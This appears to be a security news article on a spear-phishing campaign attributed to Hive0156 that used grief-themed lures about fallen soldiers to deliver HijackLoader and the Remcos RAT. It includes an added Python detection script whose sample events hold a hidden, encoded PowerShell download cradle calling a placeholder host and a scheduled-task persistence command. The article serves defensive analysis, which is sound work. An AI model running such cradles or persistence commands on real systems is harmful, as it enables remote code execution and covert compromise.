Weaponizing Grief: Hive0156 Exploits Military Families in High-Stakes Phishing
Military and governmental institutions have once again found themselves in the crosshairs of a sophisticated spear-phishing campaign, where adversaries exploit the most poignant societal anxieties as a catalyst for deception. Cybersecurity experts have identified these emotionally charged lures as the primary mechanism for a newly discovered offensive.
The operation is attributed to the threat actor Hive0156. According to the 360 Threat Intelligence Center, this group has intensified its data-exfiltration efforts throughout 2025, specifically targeting defense and administrative bodies, with a particular focus on the Verkhovna Rada.
Viber served as the initial vector for dissemination. Potential victims received archives bearing deceptively innocuous titles, containing shortcuts masquerading as official parliamentary documentation. These included fabricated queries from the Verkhovna Rada, scanned appeals from the kin of fallen servicemen, and appendices detailing casualty statistics from recent years. The thematic content was meticulously curated to elicit an urgent emotional response, compelling the recipient to engage with the file immediately.
Upon execution, the user is presented with the anticipated document, while a labyrinthine infection chain simultaneously unfurls within the system. Obfuscated PowerShell scripts are triggered in the background, fetching additional payloads from remote command-and-control servers. To circumvent defensive perimeters, the attackers employ advanced evasion tactics such as DLL Sideloading, non-standard control flow transitions, and the in-memory manipulation of legitimate system modules.
The HijackLoader utility plays a pivotal role in this orchestration, performing environment reconnaissance, neutralizing antivirus software, and establishing persistence via the Task Scheduler. To mask its malicious intent, the code mimics the behavior of legitimate Windows libraries and dynamically generates environment variables, ensuring each infection remains distinct and difficult to signature.
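As an added illustration, not code from the article or from the reports it cites, the following detection logic shows how the chain described above (an LNK target launching hidden, encoded PowerShell that fetches a payload, followed by Task Scheduler persistence) surfaces in process-creation telemetry. The Sysmon-style event shape, process IDs, paths, task name and URL are constructed placeholders.

```python
import base64
import re
# Constructed Sysmon-style process-creation events (hypothetical, not campaign telemetry): 4001 is the LNK target.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"  # placeholder URL
ENC = base64.b64encode(STAGE1.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 4001, "ppid": 1200, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": f"powershell.exe -nop -w hidden -ep bypass -enc {ENC}"},
    {"pid": 4002, "ppid": 4001, "parent": PS, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 15 /tn "UpdateCheck" /tr "C:\Users\Public\Libraries\loader.exe" /f'},
    {"pid": 4003, "ppid": 1200, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},  # benign administrator script
]

RULES = {  # applied to the command line plus any decoded -EncodedCommand payload
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "policy_bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "schtasks_create": re.compile(r"schtasks(\.exe)?\s+/create", re.I),
}

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = RULES["encoded_command"].search(cmdline)
    try:
        return base64.b64decode(m.group(0).split()[-1], validate=True).decode("utf-16le")
    except (AttributeError, ValueError, UnicodeDecodeError):  # no match, bad base64, or odd byte count
        return None

def score_event(ev):
    """Names of every rule that fires on one event; the decoded payload is scanned as well."""
    text = ev["cmdline"] + "\n" + (decode_encoded_command(ev["cmdline"]) or "")
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def detect_chain(events):
    """(powershell_pid, indicators) per explorer.exe -> PowerShell -> schtasks /create chain with 2+ evasion markers."""
    by_pid = {ev["pid"]: ev for ev in events}
    hits = []
    for ev in events:
        ind = score_event(ev)
        parent = by_pid.get(ev["ppid"])
        if "schtasks_create" not in ind or parent is None or "powershell" not in parent["image"].lower():
            continue
        parent_ind = score_event(parent)  # a lone schtasks call from an ordinary script does not qualify
        if parent["parent"].lower().endswith("explorer.exe") and len(parent_ind) >= 2:
            hits.append((parent["pid"], parent_ind + ind))
    return hits
```

Scanning the decoded payload is what catches the download cradle here; a rule that only looks at the raw command line sees nothing but the base64 blob.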
The ultimate objective of the operation is the deployment of the Remcos Remote Access Trojan (RAT). Though commercially marketed as an administrative tool, Remcos has long been a staple in espionage campaigns. Once entrenched, it grants the adversary absolute dominion over the compromised host, facilitating data theft, remote command execution, and real-time screen surveillance through a sophisticated graphical interface.
Analysts observe that the methodologies employed—from the selection of victims and the use of instant messaging for delivery to the specific pairing of HijackLoader and Remcos—align perfectly with the established signatures of UAC-0184. This confluence of factors allows for the attribution of the campaign with a high degree of confidence.
Experts reiterate that such incursions target psychological vulnerabilities rather than technical flaws. In the current climate, subjects such as the fate of the fallen and family reparations serve as potent instruments of social engineering, transforming a cyber threat into a profound psychological ordeal.